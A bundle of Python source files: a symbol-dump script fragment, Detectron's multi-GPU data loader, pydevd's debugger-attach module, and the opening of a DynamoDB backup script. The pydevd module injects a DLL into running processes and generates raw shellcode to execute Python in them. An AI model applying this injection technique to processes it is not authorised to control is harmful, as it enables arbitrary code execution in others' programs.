"""Dumps the symbols of binary and places them in the given directory."""
queue = Queue.Queue()
print_lock = threading.Lock()
def _Worker():
while True:
binary = queue.get()
if options.verbose:
with print_lock:
print "Generating symbols for %s" % binary
syms = GetCommandOutput([DUMP_SYMS, binary])
module_line = re.match("MODULE [^ ]+ [^ ]+ ([0-9A-Fa-f]+) (.*)\r\n", syms)
if module_line == None:
with print_lock:
print "Failed to get symbols for %s" % binary
queue.task_done()
continue
output_path = os.path.join(options.symbols_dir, module_line.group(2),
module_line.group(1))
mkdir_p(output_path)
symbol_file = "%s.sym" % module_line.group(2)[:-4] # strip .pdb
f = open(os.path.join(output_path, symbol_file), 'w')
f.write(syms)
f.close()
queue.task_done()
for binary in binaries:
queue.put(binary)
for _ in range(options.jobs):
t = threading.Thread(target=_Worker)
t.daemon = True
t.start()
queue.join()
def main():
parser = optparse.OptionParser()
parser.add_option('', '--symbols-dir', default='',
help='The directory where to write the symbols file.')
parser.add_option('', '--clear', default=False, action='store_true',
help='Clear the symbols directory before writing new '
'symbols.')
parser.add_option('-j', '--jobs', default=CONCURRENT_TASKS, action='store',
type='int', help='Number of parallel tasks to run.')
parser.add_option('-v', '--verbose', action='store_true',
help='Print verbose status output.')
(options, directories) = parser.parse_args()
if not options.symbols_dir:
print "Required option --symbols-dir missing."
return 1
if options.clear:
try:
shutil.rmtree(options.symbols_dir)
except:
pass
pdbs = []
for directory in directories:
pdbs += glob.glob(os.path.join(directory, '*.exe.pdb'))
pdbs += glob.glob(os.path.join(directory, '*.dll.pdb'))
GenerateSymbols(options, pdbs)
return 0
if '__main__' == __name__:
sys.exit(main())
|
loader.py
|
# Copyright (c) 2017-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
"""Detectron data loader. The design is generic and abstracted away from any
details of the minibatch. A minibatch is a dictionary of blob name keys and
their associated numpy (float32 or int32) ndarray values.
Outline of the data loader design:
loader thread\
loader thread \ / GPU 1 enqueue thread -> feed -> EnqueueOp
... -> minibatch queue -> ...
loader thread / \ GPU N enqueue thread -> feed -> EnqueueOp
loader thread/
<---------------------------- CPU -----------------------------|---- GPU ---->
A pool of loader threads construct minibatches that are put onto the shared
minibatch queue. Each GPU has an enqueue thread that pulls a minibatch off the
minibatch queue, feeds the minibatch blobs into the workspace, and then runs
an EnqueueBlobsOp to place the minibatch blobs into the GPU's blobs queue.
During each fprop the first thing the network does is run a DequeueBlobsOp
in order to populate the workspace with the blobs from a queued minibatch.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from collections import deque
from collections import OrderedDict
import logging
import numpy as np
import signal
import threading
import time
import uuid
import cv2
import os
from six.moves import queue as Queue
from caffe2.python import core, workspace
from detectron.core.config import cfg
from detectron.roi_data.minibatch import get_minibatch
from detectron.roi_data.minibatch import get_minibatch_blob_names
from detectron.utils.coordinator import coordinated_get
from detectron.utils.coordinator import coordinated_put
from detectron.utils.coordinator import Coordinator
import detectron.utils.c2 as c2_utils
logger = logging.getLogger(__name__)
class RoIDataLoader(object):
def __init__(
self,
roidb,
num_loaders=4,
minibatch_queue_size=64,
blobs_queue_capacity=8
):
self._roidb = roidb
self._lock = threading.Lock()
self._perm = deque(range(len(self._roidb)))
self._cur = 0 # _perm cursor
# The minibatch queue holds prepared training data in host (CPU) memory
# When training with N > 1 GPUs, each element in the minibatch queue
# is actually a partial minibatch which contributes 1 / N of the
# examples to the overall minibatch
self._minibatch_queue = Queue.Queue(maxsize=minibatch_queue_size)
self._blobs_queue_capacity = blobs_queue_capacity
# Random queue name in case one instantiates multple RoIDataLoaders
self._loader_id = uuid.uuid4()
self._blobs_queue_name = 'roi_blobs_queue_{}'.format(self._loader_id)
# Loader threads construct (partial) minibatches and put them on the
# minibatch queue
self._num_loaders = num_loaders
self._num_gpus = cfg.NUM_GPUS
self.coordinator = Coordinator()
self._output_names = get_minibatch_blob_names()
self._shuffle_roidb_inds()
self.create_threads()
def minibatch_loader_thread(self):
"""Load mini-batches and put them onto the mini-batch queue."""
with self.coordinator.stop_on_exception():
while not self.coordinator.should_stop():
blobs = self.get_next_minibatch()
# Blobs must be queued in the order specified by
# self.get_output_names
ordered_blobs = OrderedDict()
for key in self.get_output_names():
assert blobs[key].dtype in (np.int32, np.float32), \
'Blob {} of dtype {} must have dtype of ' \
'np.int32 or np.float32'.format(key, blobs[key].dtype)
ordered_blobs[key] = blobs[key]
coordinated_put(
self.coordinator, self._minibatch_queue, ordered_blobs
)
logger.info('Stopping mini-batch loading thread')
def enqueue_blobs_thread(self, gpu_id, blob_names):
"""Transfer mini-batches from a mini-batch queue to a BlobsQueue."""
with self.coordinator.stop_on_exception():
while not self.coordinator.should_stop():
if self._minibatch_queue.qsize == 0:
logger.warning('Mini-batch queue is empty')
blobs = coordinated_get(self.coordinator, self._minibatch_queue)
self.enqueue_blobs(gpu_id, blob_names, blobs.values())
logger.debug(
'batch queue size {}'.format(self._minibatch_queue.qsize())
)
logger.info('Stopping enqueue thread')
def get_next_minibatch(self):
"""Return the blobs to be used for the next minibatch. Thread safe."""
valid = False
while not valid:
db_inds = self._get_next_minibatch_inds()
minibatch_db = [self._roidb[i] for i in db_inds]
blobs, valid = get_minibatch(minibatch_db)
# img = np.asarray([blobs['data'][0][2], blobs['data'][0][1], blobs['data'][0][0]]).astype('uint8')[0]
# matrix = blobs['im_tr_matrix']
# scale = blobs['im_info'][0][2]
# for gt_roi in minibatch_db[0]['boxes']:
# w, h = gt_roi[2] - gt_roi[0], gt_roi[3] - gt_roi[1]
# nw, nh = int(w * scale), int(h * scale)
# center_x, center_y = gt_roi[0] + w / 2, gt_roi[1] + h / 2
# new_center = np.dot(matrix, [[center_x], [center_y], [1.0]]).astype('int')
# new_center_x = int(new_center[0][0])
# new_center_y = int(new_center[1][0])
# nbx = int(new_center_x - nw / 2)
# nby = int(new_center_y - nh / 2)
# nbx2 = int(nbx + nw)
# nby2 = int(nby + nh)
# cv2.rectangle(img, (nbx, nby), (nbx2, nby2), (255, 0, 0), 2)
# #gt_rois.append([nbx, nby, nbx2, nby2])
# if cv2.imwrite(os.path.join(cfg.OUTPUT_DIR, str(minibatch_db[0]['id'])+'.png'), img):
# printed = 1
# else:
# printed = 0
pass
return blobs
def _shuffle_roidb_inds(self):
"""Randomly permute the training roidb. Not thread safe."""
if cfg.TRAIN.ASPECT_GROUPING:
widths = np.array([r['width'] for r in self._roidb])
heights = np.array([r['height'] for r in self._roidb])
horz = (widths >= heights)
vert = np.logical_not(horz)
horz_inds = np.where(horz)[0]
vert_inds = np.where(vert)[0]
horz_inds = np.random.permutation(horz_inds)
vert_inds = np.random.permutation(vert_inds)
mb = cfg.TRAIN.IMS_PER_BATCH
horz_inds = horz_inds[:(len(horz_inds) // mb) * mb]
vert_inds = vert_inds[:(len(vert_inds) // mb) * mb]
inds = np.hstack((horz_inds, vert_inds))
inds = np.reshape(inds, (-1, mb))
row_perm = np.random.permutation(np.arange(inds.shape[0]))
inds = np.reshape(inds[row_perm, :], (-1, ))
self._perm = inds
else:
self._perm = np.random.permutation(np.arange(len(self._roidb)))
self._perm = deque(self._perm)
self._cur = 0
def _get_next_minibatch_inds(self):
"""Return the roidb indices for the next minibatch. Thread safe."""
with self._lock:
# We use a deque and always take the *first* IMS_PER_BATCH items
# followed by *rotating* the deque so that we see fresh items
# each time. If the length of _perm is not divisible by
# IMS_PER_BATCH, then we end up wrapping around the permutation.
db_inds = [self._perm[i] for i in range(cfg.TRAIN.IMS_PER_BATCH)]
self._perm.rotate(-cfg.TRAIN.IMS_PER_BATCH)
self._cur += cfg.TRAIN.IMS_PER_BATCH
if self._cur >= len(self._perm):
self._shuffle_roidb_inds()
return db_inds
def get_output_names(self):
return self._output_names
def enqueue_blobs(self, gpu_id, blob_names, blobs):
"""Put a mini-batch on a BlobsQueue."""
assert len(blob_names) == len(blobs)
t = time.time()
dev = c2_utils.CudaDevice(gpu_id)
queue_name = 'gpu_{}/{}'.format(gpu_id, self._blobs_queue_name)
blob_names = ['gpu_{}/{}'.format(gpu_id, b) for b in blob_names]
for (blob_name, blob) in zip(blob_names, blobs):
workspace.FeedBlob(blob_name, blob, device_option=dev)
logger.debug(
'enqueue_blobs {}: workspace.FeedBlob: {}'.
format(gpu_id, time.time() - t)
)
t = time.time()
op = core.CreateOperator(
'SafeEnqueueBlobs', [queue_name] + blob_names,
blob_names + [queue_name + '_enqueue_status'],
device_option=dev
)
workspace.RunOperatorOnce(op)
logger.debug(
'enqueue_blobs {}: workspace.RunOperatorOnce: {}'.
format(gpu_id, time.time() - t)
)
def create_threads(self):
# Create mini-batch loader threads, each of which builds mini-batches
# and places them into a queue in CPU memory
self._workers = [
threading.Thread(target=self.minibatch_loader_thread)
for _ in range(self._num_loaders)
]
# Create one BlobsQueue per GPU
# (enqueue_blob_names are unscoped)
enqueue_blob_names = self.create_blobs_queues()
# Create one enqueuer thread per GPU
self._enqueuers = [
threading.Thread(
target=self.enqueue_blobs_thread,
args=(gpu_id, enqueue_blob_names)
) for gpu_id in range(self._num_gpus)
]
def start(self, prefill=False):
for w in self._workers + self._enqueuers:
w.setDaemon(True)
w.start()
if prefill:
logger.info('Pre-filling mini-batch queue...')
while not self._minibatch_queue.full():
logger.info(
' [{:d}/{:d}]'.format(
self._minibatch_queue.qsize(),
self._minibatch_queue.maxsize
)
)
time.sleep(0.1)
# Detect failure and shutdown
if self.coordinator.should_stop():
self.shutdown()
break
def has_stopped(self):
return self.coordinator.should_stop()
def shutdown(self):
self.coordinator.request_stop()
self.coordinator.wait_for_stop()
self.close_blobs_queues()
for w in self._workers + self._enqueuers:
w.join()
def create_blobs_queues(self):
"""Create one BlobsQueue for each GPU to hold mini-batches."""
for gpu_id in range(self._num_gpus):
with c2_utils.GpuNameScope(gpu_id):
workspace.RunOperatorOnce(
core.CreateOperator(
'CreateBlobsQueue', [], [self._blobs_queue_name],
num_blobs=len(self.get_output_names()),
capacity=self._blobs_queue_capacity
)
)
return self.create_enqueue_blobs()
def close_blobs_queues(self):
"""Close a BlobsQueue."""
for gpu_id in range(self._num_gpus):
with core.NameScope('gpu_{}'.format(gpu_id)):
workspace.RunOperatorOnce(
core.CreateOperator(
'CloseBlobsQueue', [self._blobs_queue_name], []
)
)
def create_enqueue_blobs(self):
blob_names = self.get_output_names()
enqueue_blob_names = [
'{}_enqueue_{}'.format(b, self._loader_id) for b in blob_names
]
for gpu_id in range(self._num_gpus):
with c2_utils.NamedCudaScope(gpu_id):
for blob in enqueue_blob_names:
workspace.CreateBlob(core.ScopedName(blob))
return enqueue_blob_names
def register_sigint_handler(self):
def signal_handler(signal, frame):
logger.info(
'SIGINT: Shutting down RoIDataLoader threads and exiting...'
)
self.shutdown()
signal.signal(signal.SIGINT, signal_handler)
|
add_code_to_python_process.py
|
r'''
Copyright: Brainwy Software Ltda.
License: EPL.
=============
Works for Windows relying on a fork of winappdbg which works in py2/3 (at least for the part we're interested in).
See: https://github.com/fabioz/winappdbg (py3 branch).
Note that the official branch for winappdbg is: https://github.com/MarioVilas/winappdbg, which should be used when it works in Py3.
A private copy is added here to make deployment easier, but changes should always be done upstream first.
Works for Linux relying on gdb.
Limitations:
============
Linux:
------
1. It possible that ptrace is disabled: /etc/sysctl.d/10-ptrace.conf
Note that even enabling it in /etc/sysctl.d/10-ptrace.conf (i.e.: making the
ptrace_scope=0), it's possible that we need to run the application that'll use ptrace (or
gdb in this case) as root (so, we must sudo the python which'll run this module).
2. It currently doesn't work in debug builds (i.e.: python_d)
Other implementations:
- pyrasite.com:
GPL
Windows/linux (in Linux it also uses gdb to connect -- although specifics are different as we use a dll to execute
code with other threads stopped). It's Windows approach is more limited because it doesn't seem to deal properly with
Python 3 if threading is disabled.
- https://github.com/google/pyringe:
Apache v2.
Only linux/Python 2.
- http://pytools.codeplex.com:
Apache V2
Windows Only (but supports mixed mode debugging)
Our own code relies heavily on a part of it: http://pytools.codeplex.com/SourceControl/latest#Python/Product/PyDebugAttach/PyDebugAttach.cpp
to overcome some limitations of attaching and running code in the target python executable on Python 3.
See: attach.cpp
Linux: References if we wanted to use a pure-python debugger:
https://bitbucket.org/haypo/python-ptrace/
http://stackoverflow.com/questions/7841573/how-to-get-an-error-message-for-errno-value-in-python
Jugaad:
https://www.defcon.org/images/defcon-19/dc-19-presentations/Jakhar/DEFCON-19-Jakhar-Jugaad-Linux-Thread-Injection.pdf
https://github.com/aseemjakhar/jugaad
Something else (general and not Python related):
- http://www.codeproject.com/Articles/4610/Three-Ways-to-Inject-Your-Code-into-Another-Proces
Other references:
- https://github.com/haypo/faulthandler
- http://nedbatchelder.com/text/trace-function.html
- https://github.com/python-git/python/blob/master/Python/sysmodule.c (sys_settrace)
- https://github.com/python-git/python/blob/master/Python/ceval.c (PyEval_SetTrace)
- https://github.com/python-git/python/blob/master/Python/thread.c (PyThread_get_key_value)
To build the dlls needed on windows, visual studio express 13 was used (see compile_dll.bat)
See: attach_pydevd.py to attach the pydev debugger to a running python process.
'''
# Note: to work with nasm compiling asm to code and decompiling to see asm with shellcode:
# x:\nasm\nasm-2.07-win32\nasm-2.07\nasm.exe
# nasm.asm&x:\nasm\nasm-2.07-win32\nasm-2.07\ndisasm.exe -b arch nasm
import ctypes
import os
import struct
import subprocess
import sys
import time
class AutoExit(object):
def __init__(self, on_exit):
self.on_exit = on_exit
def __enter__(self):
pass
def __exit__(self, *args):
self.on_exit()
class GenShellCodeHelper(object):
def __init__(self, is_64):
from winappdbg import compat
self.is_64 = is_64
self._code = []
if not is_64:
self._translations = {
'push esi': b'\x56',
'push eax': b'\x50',
'push ebp': b'\x55',
'push ebx': b'\x53',
'pop esi': b'\x5E',
'pop eax': b'\x58',
'pop ebp': b'\x5D',
'pop ebx': b'\x5B',
'mov esi': b'\xBE',
'mov eax': b'\xB8',
'mov ebp': b'\xBD',
'mov ebx': b'\xBB',
'call ebp': b'\xFF\xD5',
'call eax': b'\xFF\xD0',
'call ebx': b'\xFF\xD3',
'mov ebx,eax': b'\x89\xC3',
'mov eax,ebx': b'\x89\xD8',
'mov ebp,esp': b'\x89\xE5',
'mov esp,ebp': b'\x89\xEC',
'push dword': b'\x68',
'mov ebp,eax': b'\x89\xC5',
'mov eax,ebp': b'\x89\xE8',
'ret': b'\xc3',
}
else:
# Translate 64 bits
self._translations = {
'push rsi': b'\x56',
'push rax': b'\x50',
'push rbp': b'\x55',
'push rbx': b'\x53',
'push rsp': b'\x54',
'push rdi': b'\x57',
'pop rsi': b'\x5E',
'pop rax': b'\x58',
'pop rbp': b'\x5D',
'pop rbx': b'\x5B',
'pop rsp': b'\x5C',
'pop rdi': b'\x5F',
'mov rsi': b'\x48\xBE',
'mov rax': b'\x48\xB8',
'mov rbp': b'\x48\xBD',
'mov rbx': b'\x48\xBB',
'mov rdi': b'\x48\xBF',
'mov rcx': b'\x48\xB9',
'mov rdx': b'\x48\xBA',
'call rbp': b'\xFF\xD5',
'call rax': b'\xFF\xD0',
'call rbx': b'\xFF\xD3',
'mov rbx,rax': b'\x48\x89\xC3',
'mov rax,rbx': b'\x48\x89\xD8',
'mov rbp,rsp': b'\x48\x89\xE5',
'mov rsp,rbp': b'\x48\x89\xEC',
'mov rcx,rbp': b'\x48\x89\xE9',
'mov rbp,rax': b'\x48\x89\xC5',
'mov rax,rbp': b'\x48\x89\xE8',
'mov rdi,rbp': b'\x48\x89\xEF',
'ret': b'\xc3',
}
def push_addr(self, addr):
self._code.append(self.translate('push dword'))
self._code.append(addr)
def push(self, register):
self._code.append(self.translate('push %s' % register))
return AutoExit(lambda: self.pop(register))
def pop(self, register):
self._code.append(self.translate('pop %s' % register))
def mov_to_register_addr(self, register, addr):
self._code.append(self.translate('mov %s' % register))
self._code.append(addr)
def mov_register_to_from(self, register_to, register_from):
self._code.append(self.translate('mov %s,%s' % (register_to, register_from)))
def call(self, register):
self._code.append(self.translate('call %s' % register))
def preserve_stack(self):
self.mov_register_to_from('ebp', 'esp')
return AutoExit(lambda: self.restore_stack())
def restore_stack(self):
self.mov_register_to_from('esp', 'ebp')
def ret(self):
self._code.append(self.translate('ret'))
def get_code(self):
return b''.join(self._code)
def translate(self, code):
return self._translations[code]
def pack_address(self, address):
if self.is_64:
return struct.pack('<q', address)
else:
return struct.pack('<L', address)
def convert(self, code):
'''
Note:
If the shellcode starts with '66' controls, it needs to be changed to add [BITS 32] or
[BITS 64] to the start.
To use:
convert("""
55
53
50
BDE97F071E
FFD5
BDD67B071E
FFD5
5D
5B
58
C3
""")
'''
code = code.replace(' ', '')
lines = []
for l in code.splitlines(False):
lines.append(l)
code = ''.join(lines) # Remove new lines
return code.decode('hex')
def resolve_label(process, label):
max_attempts = 10
for i in range(max_attempts):
try:
address = process.resolve_label(label)
if not address:
raise AssertionError('%s not resolved.' % (label,))
return address
except:
try:
process.scan_modules()
except:
pass
if i == max_attempts - 1:
raise
# At most 4 seconds to resolve it.
time.sleep(4. / max_attempts)
def is_python_64bit():
return (struct.calcsize('P') == 8)
def is_mac():
import platform
return platform.system() == 'Darwin'
def run_python_code_windows(pid, python_code, connect_debugger_tracing=False, show_debug_info=0):
assert '\'' not in python_code, 'Having a single quote messes with our command.'
from winappdbg.process import Process
if not isinstance(python_code, bytes):
python_code = python_code.encode('utf-8')
process = Process(pid)
bits = process.get_bits()
is_64 = bits == 64
if is_64 != is_python_64bit():
raise RuntimeError("The architecture of the Python used to connect doesn't match the architecture of the target.\n"
"Target 64 bits: %s\n"
"Current Python 64 bits: %s" % (is_64, is_python_64bit()))
print('Connecting to %s bits target' % (bits,))
assert resolve_label(process, b'PyGILState_Ensure')
filedir = os.path.dirname(__file__)
if is_64:
suffix = 'amd64'
else:
suffix = 'x86'
target_dll = os.path.join(filedir, 'attach_%s.dll' % suffix)
if not os.path.exists(target_dll):
raise RuntimeError('Could not find dll file to inject: %s' % target_dll)
print('Injecting dll')
process.inject_dll(target_dll.encode('mbcs'))
print('Dll injected')
process.scan_modules()
attach_func = resolve_label(process, b'AttachAndRunPythonCode')
assert attach_func
print('Allocating code in target process')
assert isinstance(python_code, bytes)
code_address = process.malloc(len(python_code))
assert code_address
print('Writing code in target process')
process.write(code_address, python_code)
print('Allocating return value memory in target process')
attach_info_address = process.malloc(ctypes.sizeof(ctypes.c_int))
assert attach_info_address
CONNECT_DEBUGGER = 2
attach_info = 0
if show_debug_info:
SHOW_DEBUG_INFO = 1
attach_info |= SHOW_DEBUG_INFO # Uncomment to show debug info
if connect_debugger_tracing:
attach_info |= CONNECT_DEBUGGER
# Note: previously the attach_info address was treated as read/write to have the return
# value, but it seems that sometimes when the program wrote back the memory became
# unreadable with the stack trace below when trying to read, so, we just write and
# no longer inspect the return value.
# i.e.:
# Traceback (most recent call last):
# File "X:\pydev\plugins\org.python.pydev.core\pysrc\pydevd_attach_to_process\attach_pydevd.py", line 72, in <module>
# main(process_command_line(sys.argv[1:]))
# File "X:\pydev\plugins\org.python.pydev.core\pysrc\pydevd_attach_to_process\attach_pydevd.py", line 68, in main
# setup['pid'], python_code, connect_debugger_tracing=True, show_debug_info=show_debug_info_on_target_process)
# File "X:\pydev\plugins\org.python.pydev.core\pysrc\pydevd_attach_to_process\add_code_to_python_process.py", line 392, in run_python_code_windows
# return_code = process.read_int(return_code_address)
# File "X:\pydev\plugins\org.python.pydev.core\pysrc\pydevd_attach_to_process\winappdbg\process.py", line 1673, in read_int
# return self.__read_c_type(lpBaseAddress, b'@l', ctypes.c_int)
# File "X:\pydev\plugins\org.python.pydev.core\pysrc\pydevd_attach_to_process\winappdbg\process.py", line 1568, in __read_c_type
# packed = self.read(address, size)
# File "X:\pydev\plugins\org.python.pydev.core\pysrc\pydevd_attach_to_process\winappdbg\process.py", line 1598, in read
# if not self.is_buffer(lpBaseAddress, nSize):
# File "X:\pydev\plugins\org.python.pydev.core\pysrc\pydevd_attach_to_process\winappdbg\process.py", line 2843, in is_buffer
# mbi = self.mquery(address)
# File "X:\pydev\plugins\org.python.pydev.core\pysrc\pydevd_attach_to_process\winappdbg\process.py", line 2533, in mquery
# return win32.VirtualQueryEx(hProcess, lpAddress)
# File "X:\pydev\plugins\org.python.pydev.core\pysrc\pydevd_attach_to_process\winappdbg\win32\kernel32.py", line 3742, in VirtualQueryEx
# raise ctypes.WinError()
# PermissionError: [WinError 5] Access is denied.
# Process finished with exitValue: 1
process.write_int(attach_info_address, attach_info)
helper = GenShellCodeHelper(is_64)
if is_64:
# Interesting read: http://msdn.microsoft.com/en-us/library/ms235286.aspx
# Overview of x64 Calling Conventions (for windows: Linux is different!)
# Register Usage: http://msdn.microsoft.com/en-us/library/9z1stfyw.aspx
# The registers RAX, RCX, RDX, R8, R9, R10, R11 are considered volatile and must be considered destroyed on function calls (unless otherwise safety-provable by analysis such as whole program optimization).
#
# The registers RBX, RBP, RDI, RSI, RSP, R12, R13, R14, and R15 are considered nonvolatile and must be saved and restored by a function that uses them.
#
# Important: RCX: first int argument
with helper.push('rdi'): # This one REALLY must be pushed/poped
with helper.push('rsp'):
with helper.push('rbp'):
with helper.push('rbx'):
with helper.push('rdi'): # Note: pop is automatic.
helper.mov_to_register_addr('rcx', helper.pack_address(code_address))
helper.mov_to_register_addr('rdx', helper.pack_address(attach_info_address))
helper.mov_to_register_addr('rbx', helper.pack_address(attach_func))
helper.call('rbx')
else:
with helper.push('eax'): # Note: pop is automatic.
with helper.push('ebp'):
with helper.push('ebx'):
with helper.preserve_stack():
# Put our code as a parameter in the stack (on x86, we push parameters to
# the stack)
helper.push_addr(helper.pack_address(attach_info_address))
helper.push_addr(helper.pack_address(code_address))
helper.mov_to_register_addr('ebx', helper.pack_address(attach_func))
helper.call('ebx')
helper.ret()
code = helper.get_code()
# Uncomment to see the disassembled version of what we just did...
# with open('f.asm', 'wb') as stream:
# stream.write(code)
#
# exe = r'x:\nasm\nasm-2.07-win32\nasm-2.07\ndisasm.exe'
# if is_64:
# arch = '64'
# else:
# arch = '32'
#
# subprocess.call((exe + ' -b %s f.asm' % arch).split())
print('Injecting code to target process')
thread, _thread_address = process.inject_code(code, 0)
timeout = None # Could receive timeout in millis.
print('Waiting for code to complete')
thread.wait(timeout)
# return_code = process.read_int(attach_info_address)
# if return_code == 0:
# print('Attach finished successfully.')
# else:
# print('Error when injecting code in target process. Error code: %s (on windows)' % (return_code,))
process.free(thread.pInjectedMemory)
process.free(code_address)
process.free(attach_info_address)
return 0
def run_python_code_linux(pid, python_code, connect_debugger_tracing=False, show_debug_info=0):
assert '\'' not in python_code, 'Having a single quote messes with our command.'
filedir = os.path.dirname(__file__)
# Valid arguments for arch are i386, i386:x86-64, i386:x64-32, i8086,
# i386:intel, i386:x86-64:intel, i386:x64-32:intel, i386:nacl,
# i386:x86-64:nacl, i386:x64-32:nacl, auto.
if is_python_64bit():
suffix = 'amd64'
arch = 'i386:x86-64'
else:
suffix = 'x86'
arch = 'i386'
print('Attaching with arch: %s' % (arch,))
target_dll = os.path.join(filedir, 'attach_linux_%s.so' % suffix)
target_dll = os.path.abspath(os.path.normpath(target_dll))
if not os.path.exists(target_dll):
raise RuntimeError('Could not find dll file to inject: %s' % target_dll)
# Note: we currently don't support debug builds
is_debug = 0
# Note that the space in the beginning of each line in the multi-line is important!
cmd = [
'gdb',
'--nw', # no gui interface
'--nh', # no ~/.gdbinit
'--nx', # no .gdbinit
# '--quiet', # no version number on startup
'--pid',
str(pid),
'--batch',
# '--batch-silent',
]
cmd.extend(["--eval-command='set scheduler-locking off'"]) # If on we'll deadlock.
cmd.extend(["--eval-command='set architecture %s'" % arch])
cmd.extend([
"--eval-command='call (void*)dlopen(\"%s\", 2)'" % target_dll,
"--eval-command='call (int)DoAttach(%s, \"%s\", %s)'" % (
is_debug, python_code, show_debug_info)
])
# print ' '.join(cmd)
env = os.environ.copy()
# Remove the PYTHONPATH (if gdb has a builtin Python it could fail if we
# have the PYTHONPATH for a different python version or some forced encoding).
env.pop('PYTHONIOENCODING', None)
env.pop('PYTHONPATH', None)
print('Running: %s' % (' '.join(cmd)))
p = subprocess.Popen(
' '.join(cmd),
shell=True,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
print('Running gdb in target process.')
out, err = p.communicate()
print('stdout: %s' % (out,))
print('stderr: %s' % (err,))
return out, err
def find_helper_script(filedir, script_name):
target_filename = os.path.join(filedir, 'linux_and_mac', script_name)
target_filename = os.path.normpath(target_filename)
if not os.path.exists(target_filename):
raise RuntimeError('Could not find helper script: %s' % target_filename)
return target_filename
def run_python_code_mac(pid, python_code, connect_debugger_tracing=False, show_debug_info=0):
assert '\'' not in python_code, 'Having a single quote messes with our command.'
filedir = os.path.dirname(__file__)
# Valid arguments for arch are i386, i386:x86-64, i386:x64-32, i8086,
# i386:intel, i386:x86-64:intel, i386:x64-32:intel, i386:nacl,
# i386:x86-64:nacl, i386:x64-32:nacl, auto.
if is_python_64bit():
suffix = 'x86_64.dylib'
arch = 'i386:x86-64'
else:
suffix = 'x86.dylib'
arch = 'i386'
print('Attaching with arch: %s' % (arch,))
target_dll = os.path.join(filedir, 'attach_%s' % suffix)
target_dll = os.path.normpath(target_dll)
if not os.path.exists(target_dll):
raise RuntimeError('Could not find dll file to inject: %s' % target_dll)
lldb_prepare_file = find_helper_script(filedir, 'lldb_prepare.py')
# Note: we currently don't support debug builds
is_debug = 0
# Note that the space in the beginning of each line in the multi-line is important!
cmd = [
'lldb',
'--no-lldbinit', # Do not automatically parse any '.lldbinit' files.
# '--attach-pid',
# str(pid),
# '--arch',
# arch,
'--script-language',
'Python'
# '--batch-silent',
]
cmd.extend([
"-o 'process attach --pid %d'" % pid,
"-o 'command script import \"%s\"'" % (lldb_prepare_file,),
"-o 'load_lib_and_attach \"%s\" %s \"%s\" %s'" % (target_dll,
is_debug, python_code, show_debug_info),
])
cmd.extend([
"-o 'process detach'",
"-o 'script import os; os._exit(1)'",
])
# print ' '.join(cmd)
env = os.environ.copy()
# Remove the PYTHONPATH (if gdb has a builtin Python it could fail if we
# have the PYTHONPATH for a different python version or some forced encoding).
env.pop('PYTHONIOENCODING', None)
env.pop('PYTHONPATH', None)
print('Running: %s' % (' '.join(cmd)))
p = subprocess.Popen(
' '.join(cmd),
shell=True,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
print('Running lldb in target process.')
out, err = p.communicate()
print('stdout: %s' % (out,))
print('stderr: %s' % (err,))
return out, err
if sys.platform == 'win32':
run_python_code = run_python_code_windows
elif is_mac():
run_python_code = run_python_code_mac
else:
run_python_code = run_python_code_linux
def test():
print('Running with: %s' % (sys.executable,))
code = '''
import os, time, sys
print(os.getpid())
#from threading import Thread
#Thread(target=str).start()
if __name__ == '__main__':
while True:
time.sleep(.5)
sys.stdout.write('.\\n')
sys.stdout.flush()
'''
p = subprocess.Popen([sys.executable, '-u', '-c', code])
try:
code = 'print("It worked!")\n'
# Real code will be something as:
# code = '''import sys;sys.path.append(r'X:\winappdbg-code\examples'); import imported;'''
run_python_code(p.pid, python_code=code)
time.sleep(3)
finally:
p.kill()
def main(args):
# Otherwise, assume the first parameter is the pid and anything else is code to be executed
# in the target process.
pid = int(args[0])
del args[0]
python_code = ';'.join(args)
# Note: on Linux the python code may not have a single quote char: '
run_python_code(pid, python_code)
if __name__ == '__main__':
args = sys.argv[1:]
if not args:
print('Expected pid and Python code to execute in target process.')
else:
if '--test' == args[0]:
test()
else:
main(args)
|
dynamodump.py
|
#!/usr/bin/env python
"""
Simple backup and restore script for Amazon DynamoDB using boto to work similarly to mysqldump.
Suitable for DynamoDB usages of smaller data volume which do not warrant the usage of AWS
Data Pipeline for backup/restores/empty.
dynamodump supports local DynamoDB instances as well (tested with dynalite).
"""
import argparse
import fnmatch
import json
import logging
import os
import shutil
import threading
import datetime
import errno
import sys
import time
import re
import zipfile
import tarfile
try:
from queue import Queue
except ImportError:
from Queue import Queue
try:
from urllib.request import urlopen
from urllib.error import URLError, HTTPError
except ImportError:
from urllib2 import urlopen, URLError, HTTPError
import boto.dynamodb2.layer1
from boto.dynamodb2.exceptions import ProvisionedThroughputExceededException
import botocore
import boto3
JSON_INDENT = 2
AWS_SLEEP_INTERVAL = 10 # seconds
LOCAL_SLEEP_INTERVAL = 1 # seconds
BATCH_WRITE_SLEEP_INTERVAL = 0.15 # seconds
MAX_BATCH_WRITE = 25 # DynamoDB limit
SCHEMA_FILE = "schema.json"
DATA_DIR = "data"
MAX_RETRY = 6
LOCAL_REGION = "local"
LOG_LEVEL = "INFO"
DATA_DUMP = "dump"
RESTORE_WRITE_CAPACITY = 25
THREAD_START_DELAY = 1 # seconds
CURRENT_WORKING_DIR = os.getcwd()
DEFAULT_PREFIX_SEPARATOR = "-"
MAX_NUMBER_BACKUP_WORKERS = 25
METADATA_URL = "http://169.254.169.254/latest/meta-data/"
def _get_aws_client(profile, region, service):
"""
Build connection to some AWS service.
"""
if region:
aws_region = region
else:
aws_region = os.getenv("AWS_DEFAULT_REGION")
# Fallback to querying metadata for region
if not aws_region:
try:
azone = urlopen(METADATA_URL + "placement/availability-zone",
data=None, timeout=5).read().decode()
aws_region = azone[:-1]
except URLError:
logging.exception("Timed out connecting to metadata service.\n\n")
sys.exit(1)
except HTTPError as e:
logging.exception("Error determining region used for AWS client. Typo in code?\n\n" +
str(e))
sys.exit(1)
if profile:
session = boto3.Session(profile_name=profile)
client = session.client(service, region_name=aws_region)
else:
